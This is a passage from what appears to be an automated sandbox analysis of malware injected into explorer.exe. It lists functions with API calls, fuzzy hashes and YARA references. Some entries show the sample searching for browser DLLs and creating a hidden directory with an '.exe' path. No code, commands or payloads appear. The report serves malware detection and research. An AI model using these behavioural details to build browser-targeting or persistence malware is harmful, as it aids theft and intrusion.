                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F312F31605AC181FE14EB59EC643747360AFD4BD4F8D8A65DD5A1B6A0EFBCC4C48312
                                                                                                                                                                                                                        Function 0DF0DED0 Relevance: 18.1, APIs: 12, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4099253644-0
                                                                                                                                                                                                                        • Opcode ID: 8d9237138fac256352b7468f837725ce4fa5155e88b43dd2637f89ceafd7e2b3
                                                                                                                                                                                                                        • Instruction ID: b99166f2866ccff9cb1a20b92bab5405440a3dbb14b7e9a74fa4772a70a21f5d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d9237138fac256352b7468f837725ce4fa5155e88b43dd2637f89ceafd7e2b3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B313C21606E4281EE14ABD9EC503743720AF88B95F4EC636CD9B07AE0EFBCC5849620
                                                                                                                                                                                                                        Function 0B0BDED0 Relevance: 18.1, APIs: 12, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4099253644-0
                                                                                                                                                                                                                        • Opcode ID: 8d9237138fac256352b7468f837725ce4fa5155e88b43dd2637f89ceafd7e2b3
                                                                                                                                                                                                                        • Instruction ID: df84d11e9a26684c445ac41b8a83938e94cbcfe9b6b5f638c784347abe0db340
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d9237138fac256352b7468f837725ce4fa5155e88b43dd2637f89ceafd7e2b3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A311D7561AA4185FF68AB95E8557EA73A0EF84F94F580B39C96E0B3A0DF3CC0448311
                                                                                                                                                                                                                        Function 0DFE9730 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 150COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFEA070: RtlInitializeCriticalSection.NTDLL ref: 0DFEA0A1
                                                                                                                                                                                                                          • Part of subcall function 0DFEA070: RtlInitializeCriticalSection.NTDLL ref: 0DFEA0AE
                                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32 ref: 0DFE97D0
                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32 ref: 0DFE97EA
                                                                                                                                                                                                                        • malloc.MSVCRT ref: 0DFE980F
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0DFE986A
                                                                                                                                                                                                                        • free.MSVCRT ref: 0DFE9873
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalHandleInitializeModuleSection$CloseFileNamefreemalloc
                                                                                                                                                                                                                        • String ID: .text$browser.dll$chrome.dll$msedge.dll$opera-browser.dll
                                                                                                                                                                                                                        • API String ID: 308684148-2401417439
                                                                                                                                                                                                                        • Opcode ID: 9922f1a821ff8e4101766f668657043e1f2f9e108e5cc67bf894b5a30c4342f5
                                                                                                                                                                                                                        • Instruction ID: e9f1d96fa9dff0573157732d5ed23f170c0f3d04d1fa554d03551263afbfe383
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9922f1a821ff8e4101766f668657043e1f2f9e108e5cc67bf894b5a30c4342f5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C451B431714B82C5EA30DF5AE8503AA7365FB88BC4F888425DA8D57724EFB8C249CB50
                                                                                                                                                                                                                        Function 0DF09730 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 150COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DF0A070: RtlInitializeCriticalSection.NTDLL ref: 0DF0A0A1
                                                                                                                                                                                                                          • Part of subcall function 0DF0A070: RtlInitializeCriticalSection.NTDLL ref: 0DF0A0AE
                                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32 ref: 0DF097D0
                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32 ref: 0DF097EA
                                                                                                                                                                                                                        • malloc.MSVCRT ref: 0DF0980F
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0DF0986A
                                                                                                                                                                                                                        • free.MSVCRT ref: 0DF09873
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalHandleInitializeModuleSection$CloseFileNamefreemalloc
                                                                                                                                                                                                                        • String ID: .text$browser.dll$chrome.dll$msedge.dll$opera-browser.dll
                                                                                                                                                                                                                        • API String ID: 308684148-2401417439
                                                                                                                                                                                                                        • Opcode ID: 9922f1a821ff8e4101766f668657043e1f2f9e108e5cc67bf894b5a30c4342f5
                                                                                                                                                                                                                        • Instruction ID: a2fa49999529729f4315141bcb03bf7ac2b6d7b87806ae7f87b2a99ec8070e49
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9922f1a821ff8e4101766f668657043e1f2f9e108e5cc67bf894b5a30c4342f5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF517332714B46C5EA20DF95A8503BA7B64F788B84F8DC026DE4E47759EF78C205DB50
                                                                                                                                                                                                                        Function 0B0B9730 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 150COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0B0BA070: RtlInitializeCriticalSection.NTDLL ref: 0B0BA0A1
                                                                                                                                                                                                                          • Part of subcall function 0B0BA070: RtlInitializeCriticalSection.NTDLL ref: 0B0BA0AE
                                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32 ref: 0B0B97D0
                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32 ref: 0B0B97EA
                                                                                                                                                                                                                        • malloc.MSVCRT ref: 0B0B980F
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0B0B986A
                                                                                                                                                                                                                        • free.MSVCRT ref: 0B0B9873
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalHandleInitializeModuleSection$CloseFileNamefreemalloc
                                                                                                                                                                                                                        • String ID: .text$browser.dll$chrome.dll$msedge.dll$opera-browser.dll
                                                                                                                                                                                                                        • API String ID: 308684148-2401417439
                                                                                                                                                                                                                        • Opcode ID: 794f7e930e3b4696333adc61535c8d6afee0dc4953acd4b971fb5ae35631caea
                                                                                                                                                                                                                        • Instruction ID: 726ac948053b9c3b84a3b0f731a102a27d8c42c14356d6e3874a463158768c80
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 794f7e930e3b4696333adc61535c8d6afee0dc4953acd4b971fb5ae35631caea
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E51B131314B85D9EA68DF91E890BEB73A5F789B80F884515DE4D47728EF38C205C740
                                                                                                                                                                                                                        Function 0DFE58E0 Relevance: 17.6, APIs: 14, Instructions: 137stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: memcpy$lstrlen$freemallocmemsetwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1433255627-0
                                                                                                                                                                                                                        • Opcode ID: c37db7af86ea43351e353991247a2596852a21180c5426c2735f30991325b677
                                                                                                                                                                                                                        • Instruction ID: 85f96295d4e3fe88e82d00790d0daff4fd4ab3968befc3e8be6d0b07458969ca
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c37db7af86ea43351e353991247a2596852a21180c5426c2735f30991325b677
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 70515C76704A8086EB24DF1AE89436A7761FB89BC8F048429DE8E5BB14DF78C585CB00
                                                                                                                                                                                                                        Function 0DF058E0 Relevance: 17.6, APIs: 14, Instructions: 137stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: memcpy$lstrlen$freemallocmemsetwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1433255627-0
                                                                                                                                                                                                                        • Opcode ID: c37db7af86ea43351e353991247a2596852a21180c5426c2735f30991325b677
                                                                                                                                                                                                                        • Instruction ID: 796464b6c46f919bc4f5e3edb4a50de4046ef54984258a4e951611afe293565b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c37db7af86ea43351e353991247a2596852a21180c5426c2735f30991325b677
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E6518C76304B8586EB24DF5AE94436A7761FB89BC4F05902ADE4E47B98DF7CC604CB10
                                                                                                                                                                                                                        Function 0B0B58E0 Relevance: 17.6, APIs: 14, Instructions: 137stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: memcpy$lstrlen$freemallocmemsetwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1433255627-0
                                                                                                                                                                                                                        • Opcode ID: 40c48ae8ec2343bbb3b98df1a77e89d385d27f4f5d1111ebd434155fb02d25df
                                                                                                                                                                                                                        • Instruction ID: c38bcd35e60f4310163daa3c8ad9a8e490a2cf12f4eef350124da8d1bd43790f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 40c48ae8ec2343bbb3b98df1a77e89d385d27f4f5d1111ebd434155fb02d25df
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47517B76305B8086EB68DF16E85579A73A2FB89FC4F044429CE6A43B58EF7CC545CB00
                                                                                                                                                                                                                        Function 0DFDF170 Relevance: 16.6, APIs: 11, Instructions: 112memoryfileCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Heap$File$Process$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3250796435-0
                                                                                                                                                                                                                        • Opcode ID: 0a607bf21309d90129901fbe76862cdc2aade6855692662ea219d9fad2cac3af
                                                                                                                                                                                                                        • Instruction ID: f2c26675b931cc027e73803462f2ba03c5a814110e8918563769b85d66d2d820
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a607bf21309d90129901fbe76862cdc2aade6855692662ea219d9fad2cac3af
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75417E36704B8286DB50CF6AE854B6A77A5FF88B95F088136DE5F43B54DF38C0498724
                                                                                                                                                                                                                        Function 0DEFF170 Relevance: 16.6, APIs: 11, Instructions: 112memoryfileCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Heap$File$Process$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3250796435-0
                                                                                                                                                                                                                        • Opcode ID: 0a607bf21309d90129901fbe76862cdc2aade6855692662ea219d9fad2cac3af
                                                                                                                                                                                                                        • Instruction ID: 5c3e315ccab0ddd647ddef0a1f71a054b9ab33a24398de247126b47b40805bb8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a607bf21309d90129901fbe76862cdc2aade6855692662ea219d9fad2cac3af
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC416D3A704B42C6EB10CF66E85476A77A4FF88B94F458226DF5E53754EF38C1498B20
                                                                                                                                                                                                                        Function 0DFDEF20 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 53stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFDEDF0: GetWindowsDirectoryW.KERNEL32 ref: 0DFDEE43
                                                                                                                                                                                                                          • Part of subcall function 0DFDEDF0: GetVolumeInformationW.KERNEL32 ref: 0DFDEE92
                                                                                                                                                                                                                          • Part of subcall function 0DFDEDF0: wsprintfW.USER32 ref: 0DFDEEF4
                                                                                                                                                                                                                        • SHGetFolderPathW.SHELL32 ref: 0DFDEF85
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0DFDEF95
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0DFDEFA3
                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32 ref: 0DFDEFAE
                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32 ref: 0DFDEFBC
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0DFDEFCC
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0DFDEFDA
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0DFDEFEA
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                        • Opcode ID: 8cda6bf699b11194287b385e9dca5f54407a9181ab1747b4e183116ebe9e3583
                                                                                                                                                                                                                        • Instruction ID: 4e0c93225ab964b872f3931034f5ad39be7cabe55739bba992784860cef54069
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8cda6bf699b11194287b385e9dca5f54407a9181ab1747b4e183116ebe9e3583
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F721F072318B4286EA50DF65F85836D33A1FF89B40F45A036DA8F87718EE39C519C724
                                                                                                                                                                                                                        Function 0DEFEF20 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 53stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DEFEDF0: GetWindowsDirectoryW.KERNEL32 ref: 0DEFEE43
                                                                                                                                                                                                                          • Part of subcall function 0DEFEDF0: GetVolumeInformationW.KERNEL32 ref: 0DEFEE92
                                                                                                                                                                                                                          • Part of subcall function 0DEFEDF0: wsprintfW.USER32 ref: 0DEFEEF4
                                                                                                                                                                                                                        • SHGetFolderPathW.SHELL32 ref: 0DEFEF85
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0DEFEF95
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0DEFEFA3
                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32 ref: 0DEFEFAE
                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32 ref: 0DEFEFBC
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0DEFEFCC
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0DEFEFDA
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0DEFEFEA
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                        • Opcode ID: 8cda6bf699b11194287b385e9dca5f54407a9181ab1747b4e183116ebe9e3583
                                                                                                                                                                                                                        • Instruction ID: 4ca457c8f43c2242b82a9e656cbb01c13aac4953142c9bda33f2a249fb9b1458
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8cda6bf699b11194287b385e9dca5f54407a9181ab1747b4e183116ebe9e3583
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0A21047A318B42C6EA54DF65F85832933A1FF89B80F45A036DA8F87714EE39C118C720
                                                                                                                                                                                                                        Function 0DFDF010 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 48stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFDECD0: GetWindowsDirectoryA.KERNEL32 ref: 0DFDED1C
                                                                                                                                                                                                                          • Part of subcall function 0DFDECD0: GetVolumeInformationA.KERNEL32 ref: 0DFDED66
                                                                                                                                                                                                                          • Part of subcall function 0DFDECD0: wsprintfA.USER32 ref: 0DFDEDC7
                                                                                                                                                                                                                        • SHGetFolderPathA.SHELL32 ref: 0DFDF063
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DFDF073
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DFDF081
                                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32 ref: 0DFDF08C
                                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32 ref: 0DFDF09A
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DFDF0AA
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DFDF0B8
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DFDF0C8
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                        • Opcode ID: 9adc26f88c8acaf0b2b7dee1d1ac7080130c72d70f73d82a369a8dadedcda82c
                                                                                                                                                                                                                        • Instruction ID: 0feb205259d17a3c8ed090597bc8e2bd8008f230f930c55a000a6ac750113ccc
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9adc26f88c8acaf0b2b7dee1d1ac7080130c72d70f73d82a369a8dadedcda82c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03110D72218B4681EB449F65FC5476A73A2FF89B45F44A032DA8B47B28DE7CC05D8714
                                                                                                                                                                                                                        Function 0DEFF010 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 48stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DEFECD0: GetWindowsDirectoryA.KERNEL32 ref: 0DEFED1C
                                                                                                                                                                                                                          • Part of subcall function 0DEFECD0: GetVolumeInformationA.KERNEL32 ref: 0DEFED66
                                                                                                                                                                                                                          • Part of subcall function 0DEFECD0: wsprintfA.USER32 ref: 0DEFEDC7
                                                                                                                                                                                                                        • SHGetFolderPathA.SHELL32 ref: 0DEFF063
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DEFF073
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DEFF081
                                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32 ref: 0DEFF08C
                                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32 ref: 0DEFF09A
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DEFF0AA
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DEFF0B8
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DEFF0C8
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                        • Opcode ID: 9adc26f88c8acaf0b2b7dee1d1ac7080130c72d70f73d82a369a8dadedcda82c
                                                                                                                                                                                                                        • Instruction ID: 369bbee926599ad3f297ddeb02fb538ea1fe681ba5f0625bc18982aeeff077a9
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9adc26f88c8acaf0b2b7dee1d1ac7080130c72d70f73d82a369a8dadedcda82c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE111A6A214B42C1EB44DFA5F85476A73A2FF89B50F44A036EA8B47728DE7CC1588B14
                                                                                                                                                                                                                        Function 0DFD45F0 Relevance: 13.6, APIs: 9, Instructions: 120stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFD47B0: isdigit.MSVCRT ref: 0DFD47D7
                                                                                                                                                                                                                        • tolower.MSVCRT ref: 0DFD4668
